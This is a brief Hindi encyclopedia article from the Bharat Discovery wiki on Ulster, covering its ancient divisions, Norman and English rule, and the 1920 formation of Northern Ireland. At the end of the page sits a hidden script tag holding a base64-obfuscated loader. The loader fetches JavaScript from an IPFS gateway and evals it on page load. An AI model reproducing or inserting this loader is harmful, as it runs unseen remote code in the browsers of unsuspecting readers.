अल्स्टर

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

अल्स्टर आयरलैंड के उत्तर में एक प्रांत है। सन्‌ 1920 में आयरलैंड में छह काउंटियों को एक में सम्मिलित करके उन्हें अल्स्टर कहा गया और उनका शासन अलग कर दिया गया जो उत्तर आयरलैंड की सरकार के नाम से प्रसिद्ध हुआ। अल्स्टर आयरलैंड की भाषा में उलध कहलाता था। इसका इतिहास बहुत प्राचीन है। पहले यह आयरलैंड का एक प्रांत था, परंतु सन्‌ 400 ई. में यह तीन भागों में विभक्त और अलग-अलग व्यक्तियों के अधीन हो गया।[1] पीछे सब भाग ओठनील परिवार के शासन में आ गए। नॉर्मन आक्रमण के बाद यहाँ का शासन विदेशियों के हाथ में चला गया, परंतु 15वीं शताब्दी के बाद अल्स्टर के ही दो व्यक्तियों का प्रभुत्व सारे अल्स्टर में स्थापित हो गया। सन्‌ 1603-1607 में यहाँ अंग्रेजों का शासन हो गया और तब बहुत से अंगेज और स्काट यहाँ आ बसे[2]



पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. हिन्दी विश्वकोश, खण्ड 1 |प्रकाशक: नागरी प्रचारिणी सभा, वाराणसी |संकलन: भारत डिस्कवरी पुस्तकालय |पृष्ठ संख्या: 270 |
  2. द्र. 'आयरलेट'

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>